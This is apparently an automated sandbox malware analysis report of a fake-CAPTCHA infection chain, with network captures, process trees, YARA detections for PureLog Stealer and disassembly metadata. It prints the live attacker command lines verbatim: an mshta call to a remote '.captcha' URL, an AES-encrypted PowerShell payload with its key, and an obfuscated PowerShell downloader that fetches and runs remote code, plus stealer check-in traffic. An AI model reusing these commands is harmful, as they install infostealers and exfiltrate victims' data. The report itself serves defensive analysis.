                                                                                                                                            2024-12-21 19:15:39 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=ZNDRC0WE
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1199
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:39 UTC1199OUTData Raw: 2d 2d 5a 4e 44 52 43 30 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 33 45 41 32 39 41 34 36 42 39 34 37 39 38 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 5a 4e 44 52 43 30 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4e 44 52 43 30 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 5a 4e 44 52 43 30 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                            Data Ascii: --ZNDRC0WEContent-Disposition: form-data; name="hwid"833EA29A46B9479837CB803551D62973--ZNDRC0WEContent-Disposition: form-data; name="pid"1--ZNDRC0WEContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--ZNDRC0WEContent-Disposi
                                                                                                                                            2024-12-21 19:15:40 UTC1139INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:40 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=9pcjiq1k9krmnpf102vv256965; expires=Wed, 16 Apr 2025 13:02:19 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qm2dRl5NkKgPsJhbZEe784q6KJgxqJhfr2iB2CoEXgjwxwTP4QBFQ%2FUwNiH0xh7Wejd5iIsM6gNID3tdjP26eRmEcSGHcYMBnOvJd6R4GaNvR%2B%2BZfEu8%2BDr%2BnGc%2B4beWoO%2BTRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a33bfb88bde98-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1628&rtt_var=813&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2107&delivery_rate=1793611&cwnd=212&unsent_bytes=0&cid=6f450851167e208f&ts=1042&x=0"
                                                                                                                                            2024-12-21 19:15:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-21 19:15:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            9192.168.2.449826172.67.151.193443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:15:42 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=QTRNNL8AAPBPJ18XQI
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1129
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:42 UTC1129OUTData Raw: 2d 2d 51 54 52 4e 4e 4c 38 41 41 50 42 50 4a 31 38 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 33 45 41 32 39 41 34 36 42 39 34 37 39 38 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 51 54 52 4e 4e 4c 38 41 41 50 42 50 4a 31 38 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 54 52 4e 4e 4c 38 41 41 50 42 50 4a 31 38 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c
                                                                                                                                            Data Ascii: --QTRNNL8AAPBPJ18XQIContent-Disposition: form-data; name="hwid"833EA29A46B9479837CB803551D62973--QTRNNL8AAPBPJ18XQIContent-Disposition: form-data; name="pid"1--QTRNNL8AAPBPJ18XQIContent-Disposition: form-data; name="lid"jMw1IE--SHELL
                                                                                                                                            2024-12-21 19:15:43 UTC1130INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:42 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=sn5qtjj470b725po5accpbc608; expires=Wed, 16 Apr 2025 13:02:21 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKIAYovM8hy1bK1zHDL6g%2BMUTcC%2Bd58YqZvFslFZKEc78agc8jn0VWXYjcbgyL7p5JU07UYvWOeOO41Rf39Ys20ldFRXxchfnBL6KjHEYJSGLtB%2BRBRNrntxyRuW52zBTWrxxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a33ce6a2843b8-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1708&rtt_var=651&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2047&delivery_rate=1666666&cwnd=231&unsent_bytes=0&cid=3a40aa3cb275eec0&ts=863&x=0"
                                                                                                                                            2024-12-21 19:15:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-21 19:15:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:14:13:29
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd /C ""C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha"
                                                                                                                                            Imagebase:0x240000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:14:13:29
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:14:13:29
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha
                                                                                                                                            Imagebase:0x6b0000
                                                                                                                                            File size:13'312 bytes
                                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:14:13:36
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D71017DA8A8FE9CCBCC76E3BA3B6A95D1ED2A4A44A168E8636A1C900DADF3286F3ED2FDAD098EE58C7B6AFCCBC68203649484FF462A21AD9EE06F0B2A24495E62A40046DF6C39B77D47A014F0F0940CF765920FB7FA754DFE80F9D4138A2328D4A2F3909905D737350CA18D46A3F34F72969F4026F528EE194317064AC8ABF90F0C562A82D0FB23D49696F85E3A60A4C23E6FC2E69C0C21061968D1E083A7DC8FB925B87086B50A6B6A111CCAA936B945BCCF1B61BA45851312BC53A436D6FD6E88D4E39E965D4CBE982D9E2C56EB4D9900');$wBTv=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((ERrXH('6B635876677359704D536E5770724B42')),[byte[]]::new(16)).TransformFinalBlock($ZMcko,0,$ZMcko.Length)); & $wBTv.Substring(0,3) $wBTv.Substring(129)
                                                                                                                                            Imagebase:0xea0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:14:13:36
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:14:13:37
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
                                                                                                                                            Imagebase:0xea0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2813404644.000000000D3E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2722035542.0000000007890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:14:13:37
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:14:15:10
                                                                                                                                            Start date:21/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                            Imagebase:0xea0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Executed Functions

                                                                                                                                              Function 0AF40000 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768344435.000000000AF40000.00000010.00000800.00020000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_af40000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !$lS
                                                                                                                                              • API String ID: 0-3731077821
                                                                                                                                              • Opcode ID: 12745787ef687b2d320e494a80d53159b3e90d9895cce13ed5251232432fd444
                                                                                                                                              • Instruction ID: 7b7976d1fd117fff61b65103afc9b09cdfa04322c75b893d40c9116a682016c0
                                                                                                                                              • Opcode Fuzzy Hash: 12745787ef687b2d320e494a80d53159b3e90d9895cce13ed5251232432fd444
                                                                                                                                              • Instruction Fuzzy Hash: 33410231B04354AFEB208E58C881B79BBD5EB85320F814568EF55DB392DB789C44CAE2
                                                                                                                                              Function 0A5D0FCF Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 0A5D0FC7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 0A5D0FE7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 0A5D0F9F Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 0A5D0FBF Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 0A5D0FB7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 0A5D0FAF Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000003.1768438022.000000000A5D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_3_a5d0000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction ID: 63e394c17126702a346c7b27e4fd61981c015f5ea83512626f995023516f1610
                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                              • Instruction Fuzzy Hash:

                                                                                                                                              Executed Functions

                                                                                                                                              Function 04C7476A Relevance: 6.4, Strings: 5, Instructions: 174COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: bd_$m^$m^$m^$m^
                                                                                                                                              • API String ID: 0-2355349439
                                                                                                                                              • Opcode ID: 06997ab072a1e68a2d244495102f72f431c6dc85738746f860f26236734f52d2
                                                                                                                                              • Instruction ID: 7fc485478f260f53b9597074477813fbdbc967bf9e1bf9156efc7f0f6eb1fcce
